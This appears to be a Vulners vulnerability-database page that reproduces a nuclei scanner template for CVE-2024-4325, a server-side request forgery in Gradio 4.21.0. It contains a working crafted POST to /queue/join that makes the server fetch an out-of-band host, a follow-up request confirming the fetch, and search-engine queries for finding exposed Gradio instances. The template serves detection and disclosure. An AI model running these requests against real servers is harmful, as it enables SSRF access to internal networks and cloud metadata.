Lucene search
K

Gradio - Server-Side Request Forgery

🗓️ 07 Jul 2026 16:50:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 15 Views

Server-Side Request Forgery vulnerability in Gradio version 4.21.0 allows unauthorized network access

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-4325
17 Feb 202500:00
circl
CNNVD
Gradio Code Issue Vulnerability
6 Jun 202400:00
cnnvd
CVE
CVE-2024-4325
6 Jun 202417:55
cve
Cvelist
CVE-2024-4325 Server-Side Request Forgery (SSRF) in gradio-app/gradio
6 Jun 202417:55
cvelist
Github Security Blog
Server-Side Request Forgery in gradio
6 Jun 202418:30
github
NVD
CVE-2024-4325
6 Jun 202418:15
nvd
OSV
GHSA-973G-55HP-3FRW Server-Side Request Forgery in gradio
6 Jun 202418:30
osv
OSV
PYSEC-2026-1413 Server-Side Request Forgery in gradio
7 Jul 202611:45
osv
Positive Technologies
PT-2024-30411
6 Jun 202400:00
ptsecurity
PyPA
Server-Side Request Forgery in gradio
7 Jul 202611:45
pypa
Rows per page
id: CVE-2024-4325

info:
  name: Gradio - Server-Side Request Forgery
  author: iamnoooob,pdresearch
  severity: high
  description: |
    A Server-Side Request Forgery (SSRF) vulnerability exists in the gradio-app/gradio version 4.21.0, specifically within the `/queue/join` endpoint and the `save_url_to_cache` function. The vulnerability arises when the `path` value, obtained from the user and expected to be a URL, is used to make an HTTP request without sufficient validation checks. This flaw allows an attacker to send crafted requests that could lead to unauthorized access to the local network or the AWS metadata endpoint, thereby compromising the security of internal servers.
  impact: |
    Unauthenticated attackers can force the server to make arbitrary requests via SSRF, potentially accessing internal services and cloud metadata endpoints.
  remediation: |
    Update Gradio to a version later than 4.21.0 that patches the SSRF vulnerability.
  reference:
    - https://github.com/advisories/GHSA-973g-55hp-3frw
    - https://nvd.nist.gov/vuln/detail/CVE-2024-4325
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cve-id: CVE-2024-4325
    cwe-id: CWE-918
    epss-score: 0.37366
    epss-percentile: 0.98343
    cpe: cpe:2.3:a:gradio_project:gradio:*:*:*:*:*:python:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: gradio_project
    product: gradio
    framework: python
    shodan-query:
      - http.html:"__gradio_mode__"
      - http.title:"gradio"
    fofa-query:
      - body="__gradio_mode__"
      - title="gradio"
    google-query: intitle:"gradio"
  tags: cve,cve2024,gradio,ssrf,cloud,oast,vkev,vuln

flow: http(1) && http(2)

variables:
  oast: "http://oast.fun"
  h_oast: "{{sha1(oast)}}"

http:
  - raw:
      - |
        POST /queue/join? HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
            "data": [
                [
                    {
                        "meta": {
                            "_type": "gradio.FileData"
                        },
                        "path": "{{oast}}",
                        "url": "http://127.0.0.1:7860/file=/tmp/gradio/d1be868eeb62e5194df165ccd8becbc5b3ffb299/favicon.ico",
                        "orig_name": "favicon.ico",
                        "size": 15406,
                        "mime_type": "image/x-icon"
                    }
                ]
            ],
            "event_data": null,
            "fn_index": 0,
            "trigger_id": 2,
            "session_hash": "l8v6ku4cm8d"
        }

    matchers:
      - type: dsl
        dsl:
          - 'contains(content_type, "application/json")'
          - 'contains(body, "event_id")'
        condition: and
        internal: true

  - raw:
      - |
        GET /file=/tmp/gradio/{{h_oast}}/oast.fun HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Interactsh Server"
          - "/projectdiscovery/interactsh"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a004730450220203fcde88bd4fb179d5c0196ae571b6d24249b660edc3dddf50c3916b96fee8a022100940cbcfb58ec9f5154f621037155f8b171701495e6ee57ea62055108fc423fb0:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.1High risk
Vulners AI Score7.1
CVSS 3.18.6
CVSS 38.6
EPSS0.37366
SSVC
15